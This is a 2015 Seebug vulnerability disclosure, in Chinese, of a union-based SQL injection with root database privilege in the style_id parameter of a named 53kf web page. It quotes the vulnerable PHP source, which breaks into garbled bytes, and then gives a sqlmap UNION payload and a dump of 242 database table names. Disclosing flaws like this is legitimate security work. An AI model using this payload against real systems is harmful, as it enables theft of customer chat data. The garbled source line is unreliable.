53kf某处root权限SQL注入

2015-01-20T00:00:00
ID SSV:94387
Type seebug
Reporter Root
Modified 2015-01-20T00:00:00

Description

简要描述:

53kf某处root权限SQL注入

详细说明:

漏洞url为http://www5.53kf.com/iframe_brief.php?style_id=106000198&language=cn 问题参数为style_id,数字型注入,支持union查询

<img src="https://images.seebug.org/upload/201501/1922472181cdf8d920c1a0de8e755e8637ca01d6.jpg" alt="531.jpg" width="600" onerror="javascript:errimg(this);">

看看可以loadfile,以下是存在注入的这个php文件源码 <?php define("IN_OK",true); require_once('include/global.php'); $style_id = get_value("style_id"); $language = get_value("language"); $notes = ""; $sql = "select config_value from company_config where style_id=".$style_id." and config_id='company_notes' and company_id!=0"; $notes = db_query11($sql); if($notes!="") { $notes = matchQQ($notes); } $tpl->assign("notes", $notes); $tpl->display("iframe_brief.htm"); // 接收$_GET[]的值 function get_value($get_name, $re="") { if(isset($_GET[$get_name]) && trim($_GET[$get_name])!="") { $re = filterSQL($_GET[$get_name]); } return $re; } // 解析QQ123456 function matchQQ($str) { global $language, $master_host; title = ""; if($language=="cn") { $title = "点击跟我QQ聊"; } else if($language=="tw") { $title = "點擊跟我QQ聊"; } else if($language=="en") { $title = "Click to chat with me"; } else { $title = "Click to chat with me"; } $str = preg_replace("/qq([0-9]+)/i","<img border=\"0\" title=\"".$title."\" src=\"http://".$master_host."/img/qq.gif\" onclick=\"addQQ('$1')\" style=\"cursor:pointer\"/>",$str); "&WGW&âG7G#°§Ð £ó

漏洞证明:

涉及到大量的数据,涉及到2W+的企业,看看表有多少吧 Place: GET Parameter: style_id Type: UNION query Title: MySQL UNION query (NULL) - 1 column (custom) Payload: style_id=-5466 UNION ALL SELECT CONCAT(0x716c756e71,0x6b7852584141 4517753,0x71746f6a71)#&language=cn


[22:50:18] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.11 [22:50:18] [INFO] fetching tables for database: 'talk' [22:50:18] [INFO] the SQL query used returns 242 entries [22:50:18] [INFO] starting 10 threads Database: talk [242 tables] +--------------------------------+ | C3P0TestTable | | identity | | module | | access | | access_log | | account_switch | | agent_oper | | agent_style_lock | | area_kf | | autoreply | | block_user | | chat_count | | chat_count_201310111524 | | chat_count_result | | chat_nation | | chat_search | | chat_tables | | chat_worker | | company | | company_ad | | company_config | | company_etel | | company_style | | company_tinet | | company_tinet_cno | | conf_ip1 | | conf_ip1_old | | conf_sync | | config_id_remark | | config_value_remark | | counter | | cus_bill | | cus_group | | cus_link | | cus_mail | | cus_sms | | cus_theme | | cus_user | | cus_web_msg | | customer | | cyy | | cyy_group | | daemonlog_recv | | daemonlog_send | | disconnect_statistics | | download_job | | email | | err_infos | | err_infos_kf | | etel_logo | | face | | file | | identity_role_id | | ill_words | | image | | imessage | | inner_identity | | kf_group | | kf_group_newthing | | kf_group_upload | | kf_share | | link | | login_off | | logo | | logsql | | mail_template | | mailqueue | | message | | message_buffer | | message_d1 | | message_d10 | | message_d11 | | message_d12 | | message_d13 | | message_d14 | | message_d15 | | message_d16 | | message_d17 | | message_d18 | | message_d19 | | message_d2 | | message_d20 | | message_d21 | | message_d22 | | message_d23 | | message_d24 | | message_d25 | | message_d26 | | message_d27 | | message_d28 | | message_d29 | | message_d3 | | message_d30 | | message_d31 | | message_d32 | | message_d33 | | message_d34 | | message_d35 | | message_d36 | | message_d37 | | message_d38 | | message_d39 | | message_d4 | | message_d40 | | message_d41 | | message_d42 | | message_d43 | | message_d44 | | message_d45 | | message_d46 | | message_d47 | | message_d48 | | message_d49 | | message_d5 | | message_d50 | | message_d51 | | message_d52 | | message_d53 | | message_d6 | | message_d7 | | message_d8 | | message_d9 | | module_new | | module_special | | module_style_num_bak | | msg_reply | | operate_log | | quality_tj | | robot | | robot_hot | | robot_mem | | room_message | | sms_config | | sms_lword | | sph_counter | | sql_sync | | stat_keyword_month | | stat_place | | stat_search | | stat_to | | statistic | | statistic_from | | statistic_mobile | | statistic_nation | | statistic_net | | statistic_place | | sync_cus_user | | sync_worker_stat | | sys_notify | | talk_evalu | | talk_his | | talk_his_buffer | | talk_his_d1 | | talk_his_d10 | | talk_his_d11 | | talk_his_d12 | | talk_his_d13 | | talk_his_d14 | | talk_his_d15 | | talk_his_d16 | | talk_his_d17 | | talk_his_d18 | | talk_his_d19 | | talk_his_d2 | | talk_his_d20 | | talk_his_d21 | | talk_his_d22 | | talk_his_d23 | | talk_his_d24 | | talk_his_d25 | | talk_his_d26 | | talk_his_d27 | | talk_his_d28 | | talk_his_d29 | | talk_his_d3 | | talk_his_d30 | | talk_his_d31 | | talk_his_d32 | | talk_his_d33 | | talk_his_d34 | | talk_his_d35 | | talk_his_d36 | | talk_his_d37 | | talk_his_d38 | | talk_his_d39 | | talk_his_d4 | | talk_his_d40 | | talk_his_d41 | | talk_his_d42 | | talk_his_d43 | | talk_his_d44 | | talk_his_d45 | | talk_his_d46 | | talk_his_d47 | | talk_his_d48 | | talk_his_d49 | | talk_his_d5 | | talk_his_d50 | | talk_his_d51 | | talk_his_d52 | | talk_his_d53 | | talk_his_d6 | | talk_his_d7 | | talk_his_d8 | | talk_his_d9 | | talk_his_delete | | talk_his_temp | | talk_id | | talk_quality | | talk_subject | | talk_theme | | talk_vote | | talk_weixin | | temp_download_2talk_his | | temp_download_chat_nation | | temp_download_chat_worker | | temp_download_cus_user | | temp_download_imessage | | temp_download_message | | temp_download_stat_place | | temp_download_statistic | | temp_download_statistic_from | | temp_download_statistic_nation | | temp_download_statistic_net | | temp_download_statistic_place | | temp_download_talk_his | | temp_download_worker | | v5_company_config | | visitor_lnk | | visitor_trace | | visitor_trace_old0730 | | wechat_guest | | weixin_config | | worker | | worker_config | | worker_group | | worker_online_log | | worker_online_log_detail | | zsk_category | | zsk_key | | zsk_noanswer | | zsk_question | +--------------------------------+